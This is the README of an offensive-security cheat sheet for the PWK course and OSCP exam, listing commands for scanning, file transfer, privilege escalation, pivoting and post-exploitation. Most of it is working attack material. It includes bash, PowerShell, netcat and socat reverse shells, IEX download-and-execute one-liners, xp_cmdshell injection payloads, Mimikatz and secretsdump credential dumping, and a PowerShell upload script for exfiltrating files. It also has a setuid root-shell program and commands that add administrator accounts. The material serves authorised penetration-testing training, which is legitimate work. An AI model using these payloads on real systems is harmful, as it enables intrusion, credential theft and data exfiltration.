JustTryHarder

JustTryHarder is a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Hacktoberfest friendly! Yes, we are open to Pull Requests for Hacktoberfest! Please ensure it is not spam and actually contributes well to this repo. Thanks & happy hacking!

Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info

I have obtained a lot of this info through other Github repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible. If I have not given you credit, please contact me on Twitter: https://twitter.com/s1nfulz

Table of Contents

• Determining the OS of a host via Ping
• BOF (WIP)
• Breakouts / Environment Escapes
• DNS - Zone Transfers
• File Transfers
• Kerberoasting
• LFI / RFI
• MSSQL / SQLi
• Password Cracking
• Password Spraying (CrackMapExec)
• Payload Generation
• PHP
• Priv Esc - Linux
• Priv Esc - Windows
• Post Exploitation
• Port Forwarding
• Socks Proxy (using PowerShell)
• Port Scanning
• Ping Sweep
• Pivoting
• Remote Desktop
• Responder
• Reverse Shells
• Shell Upgrading
• SQL Injection (SQLmap)
• Show listening ports
• SMB - Enumeration
• SMB - Impacket
• SMTP Enumeration
• ICMP Injection
• VMware (not going full screen)
• Web Servers
• Web Scanning
• Web Shells
• WordPress
• Windows Framework / Powershell
• Windows Post Exploitation Commands
• Writeable Directories
• Todo List
• Thank you

---

Determining the OS of a host via Ping

ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

The TTL can be used to determine the OS of the host. The three different types of TTL are as shown below:

• TTL=64 = *nix - The hop count; so if you are getting 61, then there are 3 hops and it is a *nix device. Most likely Linux.
• TTL=128 = Windows - Again, if the TTL is 127 then the hop is 1 and it is a Windows box.
• TTL=254 = Solaris/AIX - If the TTL is 250 then the hop count is 4 and it is a Solaris box.

BOF (WIP)

(Typical bad characters include: 0x00, 0x0A, 0x0D)

• Fuzzing
• Finding EIP position
• Finding bad chars
• Locating jmp esp
• Generating payload with msfvenom
• Getting reverse shell with netcat

Good BOF resources:

• NCC Group - Writing Exploits for Win32
• Corelan - Exploit Writing Tutorial Part 1
• GitHub - dostackbufferoverflowgood
• VeteranSec - 32-bit Windows Buffer Overflows Made Easy

Breakouts / Environment Escapes

• Pentest Partners - Breaking out of Citrix
• SRA.io - SiteKiosk Breakout
• TrustedSec - Kiosk/POS Breakout Keys
• Cognosec - Breaking out of Citrix Environment
• NetSPI - Breaking out of Applications
• NCC Group - Common Issues with Environment Breakouts (PDF)
• GracefulSecurity - Citrix Breakout

DNS - Zone Transfers

host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr

File Transfers

SMB Transfer

On the Victim machine (Windows):

net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:

Wget Transfer

How to retrieve file(s) from host (inside a reverse shell).

Setup: Place file you want transferred in /var/www/html/ and run service apache2 start.

Run on the remote server:

wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64)       # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/)   # <- for folder

TFTP Transfer

(How to transfer from Kali to Windows).

Using MSF: Start MSF before these steps:

1. use auxiliary/server/tftp
2. set TFTPROOT /usr/share/mimikatz/Win32/
3. run

Inside a terminal: 4. tftp -i 10.10.10.10 GET mimikatz.exe

NetCat (Windows to Kali)

1. Windows: nc -nv 10.11.0.61 4444 < bank-account.zip
2. Linux: nc -nlvp 4444 > bank-account.zip

PowerShell

Interactive session:

Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py

Without an interactive PowerShell session (Create wget.ps1):

$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)

Base64 (Linux -> Linux)

Local Host:

1. $(echo "cat /path/to/exploit.py | base64") > encoded.b64
2. Transfer encoded.b64 to the remote server via nc or otherwise.

Remote Server - Linux: 3. cat /path/to/encoded.b64 | base64 -d > exploit.py

Certutil

certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip

HTTP File Upload (Exfiltration)

1. Create upload.php Create in attacking machine webroot (/var/www/html by default).

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

2. Create directory Create upload directory and set appropriate permissions to allow upload.

sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads

3. Upload file Upload file from victim machine to attacking machine using PowerShell:

powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"

Kerberoasting

• GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>
• powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
• impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes

LFI / RFI

PHP Reverse Shell:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>

Command Injection:

<?php echo shell_exec(whoami);?>

MSSQL / SQLi

• EXEC master..xp_cmdshell 'whoami';
• ' exec master..xp_cmdshell 'whoami' --
• OSCP-2 SQL Injection Cheatsheet
• PentestMonkey SQL Injection

Password Cracking

Hashcat

hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt

John The Ripper

john --rules --wordlist=/path/to/your/wordlist.txt hash.txt

Password Spraying (CrackMapExec)

cme smb 10.10.10.10 -u username -d domain -p password

Payload Generation

• NETSEC - Creating Payloads
• MsfVenom Cheatsheet
• Metasploit Unleashed Payloads
• PayloadsAllTheThings

Types:

• Non-staged: netcat
• Staged: multi/handler

PHP

• The differences between exec(), shell_exec, system() and passthru()

Priv Esc - Linux

Note: If GCC & wget are installed, the system MIGHT be vulnerable to a kernel exploit.

• Linux Kernel Exploits
• GTFObins - Break out of restricted shells
  • GTFO Helper script: https://github.com/dreadnaughtsec/gtfo
• Linux Exploit Suggester
• Linux Exploit Suggester 2
• Basic Linux Privilege Escalation

Enumeration Commands:

grep -Ri 'password' .
find / -perm –4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
# (then ls -la, look for 777 file permissions)

Custom SUID binary: Requires code execution as the target user. Example: mysql sys_eval as root.

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main(){
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}

Priv Esc - Windows

• Windows Privilege Escalation Fundamentals
• Windows Privilege Escalation Guide
• PowerUp / PowerSploit
• Powerless - Enumeration Tool
• Local Privilege Escalation Workshop
• Just Another Windows (Enum) Script / JAWS
• Watson
• Sherlock (Deprecated)
• Windows Exploit Suggester

Commands:

• churrasco -d "net user /add <username> <password>"
• churrasco -d "net localgroup administrators <username> /add"
• churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"

Post Exploitation

1. Mimikatz.exe (run it)
2. privilege::debug
3. sekurlsa::logonpasswords

Port Forwarding

Local: Forward local port to remote host. Use local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine.

Remote: Forward remote port to local host. Use remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into.

Dynamic: Use SOCKS. Dynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with a software that expects SOCKS forwarding.

Chisel

Local system:

./chisel server -p 8080 --reverse

Victim:

./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234

SSH

1. Generate an SSH key pair on the box being pivoted through to protect your credentials.

ssh-keygen
cat ~/.ssh/id_rsa.pub

2. Copy the public key. Add this value and the pivot machine's IP address to the ~/.ssh/authorized_keys file on your attacking (Kali) machine using the syntax below.

from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]

3. Ensure the SSH service is running on your attacking (Kali) machine.

sudo service ssh start

4. Initiate SSH call from the box being pivoted through and specify the id_rsa private key generated in step 1.

ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]

5. Edit your proxychains config: /etc/proxychains.conf

socks4 127.0.0.1 1080

6. Run proxychains. When scanning with nmap, be sure to use TCP Connect scans.

sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10

Additional Notes:

• ssh [email protected] -R 1234:127.0.0.1:1234
• ssh -D 1337 -q -C -N -f [email protected] (Source)

Socks Proxy (using PowerShell)

Local:

• vi /etc/proxychains.conf -> socks5 <ip> 9080
• Import-Module .\Invoke-SocksProxy.psm1
• Invoke-SocksProxy -bindPort 9080
• proxychains nmap -sT <ip>

Port Scanning

TCP

reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A
nmap -p- -iL ips.txt > TCP_Ports.txt
nc -v -n -z -w1 10.10.10.10 1-10000
nmap -p- -iL ips.txt > AllTCPPorts.txt

UDP

(Can take hours, netstat is a better alternative if you have shell).

nmap -sU --top-ports 10000
nmap -sT -sU -p 22,80,110 -A
nmap -sT -sU -p- --min-rate 2000
nmap -p- -sU -iL ips.txt > udp.txt
nmap -sU -sV -iL ips.txt > alludpports.txt

Other Protocols

SNMP: nmap -p161 -sU -iL ips.txt > udp.txt

SSH: nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt

SSL: nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

NMAP Bootstrap Report:

nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl

Ping Sweep

Linux (One-liners)

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
fping -g 192.168.0.1/24

Linux (Script)

for i in `seq 1 255`
do
    ping -c1 192.168.125.$i 2>/dev/null 1>&2
    if [[ $? -eq 0 ]]
    then
        echo 192.168.125.$i is up
    fi
done

Windows (CMD)

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.

Windows (PowerShell)

$ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }

Nmap

nmap -sP 192.168.0.1-254

Pivoting

• sshuttle -r [email protected] 10.1.1.0/24

Remote Desktop

• rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/
• xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore

Responder

• responder -I tun0 -wrF
• Responder with NTLM Relay and Empire
• Practical Guide to NTLM Relaying

Reverse Shells

Linux:

• PentestMonkey - Reverse Shell Cheat Sheet
• Awansec - Reverse Shell
• RevShells.com

Windows:

• GitHub - Windows PHP Reverse Shell
• nc 10.10.10.10 4444 –e cmd.exe

Shell Upgrading

Source: Ropnop Blog & HTB Forum

Python

1. python -c 'import pty;spawn("/bin/bash");' OR python3 -c 'import pty;spawn("/bin/bash");'
2. In reverse shell:

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

3. In Kali:

stty raw -echo
fg

4. In reverse shell:

reset # (sometimes optional)
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols> # (optional)

Using Socat

Listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Victim:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Perl

1. perl -e 'exec "/bin/sh";'
2. perl: exec "/bin/sh";

Bash

/bin/sh -i

SQL Injection (SQLmap)

sqlmap -u "[http://example.com/test.php?test=test](http://example.com/test.php?test=test)" --level=5 --risk=3 --batch

Show listening ports

Linux netstat: netstat -tulpn | grep LISTEN

FreeBSD/MacOS X netstat: netstat -anp tcp | grep LISTEN netstat -anp udp | grep LISTEN

OpenBSD netstat: netstat -na -f inet | grep LISTEN netstat -nat | grep LISTEN

Nmap scan: sudo nmap -sT -O localhost sudo nmap -sU -O 192.168.2.13 (UDP) sudo nmap -sT -O 192.168.2.13 (TCP)

SMB - Enumeration

• 0xdf - SMB Enumeration Checklist
• smbmap -H 10.10.10.10
• smbclient -L 10.0.0.10
• smbclient //10.10.10.10/share$

SMB - Impacket

Impacket's PSEXEC (After creating a remote port fwd):

/usr/share/doc/python-impacket/examples/psexec.py [email protected]
# Password: (password)
# [*] Trying protocol 445/SMB...

Impacket's SMBServer (For File Transfer):

1. cd /usr/share/windows-binaries
2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
3. \\10.10.10.10\a\mimikatz.exe

SMTP Enumeration

• SMTP Commands

ICMP Injection

1. ping -n 3 10.10.10.10
2. tcpdump -i tun0 icmp

VMware (not going full screen)

systemctl restart open-vm-tools.service

Web Servers

• python -m SimpleHTTPServer 80
• python3 -m http.server 80
• ngrok http "file:///C:\Users\sinfulz\Public Folder"
• php -S 0.0.0.0:80

Web Scanning

GoBuster (Linux/Apache):

gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401

GoBuster (Windows/IIS):

gobuster dir -e -u [http://10.10.10.10/](http://10.10.10.10/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401

Dirsearch (Linux/Apache):

python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50

Dirsearch (Windows/IIS):

python3 dirsearch.py -r -u [http://10.10.10.131/](http://10.10.10.131/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50

Other GoBuster:

• HTTP: gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69
• HTTPS: gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69

Nikto:

• HTTP: nikto -h 10.10.10.10 -p 80
• HTTPS: nikto -h 10.10.10.10 -p 443

WFuzz:

wfuzz -u [http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00](http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00) -w /usr/share/wfuzz/wordlist/general/common.txt

Web Shells

• PHPBash
• p0wny-shell

WordPress

• Top Hat Sec - WP

Windows Framework / Powershell

Bypass PowerShell execution policy:

powershell -ExecutionPolicy ByPass -File script.ps1

Resources:

• Nishang
• Sherlock

Reverse PowerShell: (Sometimes powershell or echo may need to be in front of the string, or quotes used).

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerUp (from local web server):

echo IEX(New-Object Net.WebClient).DownloadString('[http://10.10.10.10:80/PowerUp.ps1](http://10.10.10.10:80/PowerUp.ps1)') | powershell -noprofile -

or

powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('[http://10.10.14.](http://10.10.14.)x/Whatever.ps1'); Invoke-Whatever"

Reverse PowerShell using MSSQL:

xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"[http://10.10.10.10/Nishang-ReverseShell.ps1](http://10.10.10.10/Nishang-ReverseShell.ps1)\")

File transfer with PowerShell:

powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')

Windows Post Exploitation Commands

WMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add

Writeable Directories

Windows

(Source: UltimateAppLockerByPassList) The following folders are by default writable by normal users (varies by OS version).

C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

Linux

To find World Writeable Directories in Linux:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

---

Todo List:

• Improve the readability of the cheatsheet
• Fill in the empty sections
• Remove unnecessary sections
• Integrate the files in the repo into the cheatsheet
• Migrate to GitBook
• Include screenshots/gifs into the cheatsheet if needed
• Add a Table of Contents

Thank you:

Thanks to these people for including my cheatsheet on their website/blog:

• KhaoticDev Cheatsheets
• NCyberSec Facebook Post
• CyberG0100 Facebook Post
• r/CyberSpaceVN Reddit Post
• XN4K PWK Cheatsheet
• OpenSourceLibs Pentesting Tools
• GitMemory (brhannah)
• BugBountyTips Blog
• PythonLang OSCP Category